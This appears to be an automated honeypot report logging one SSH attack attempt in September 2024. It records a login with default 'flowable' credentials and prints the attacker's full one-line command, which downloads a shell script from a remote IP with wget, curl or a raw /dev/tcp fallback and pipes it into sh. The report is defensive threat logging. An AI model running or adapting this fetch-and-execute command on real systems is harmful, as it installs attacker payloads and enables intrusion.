Attack Report for Observation

Header

Time: 2024/09/22, 20:26:39 (GMT)
Transaction ID: JDLWB4HQAQV2N2IA
Service: ssh
Location: NL (Netherlands)
Attacker: 5.182.211.148
Classification: Web script execution
Harm Potential: High
Description: Execution of a script downloaded from the web (www)

Content

5.182.211.148 client username 'flowable' and password 'flowable' entered
5.182.211.148 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'

All observations come from the honeypot central database.
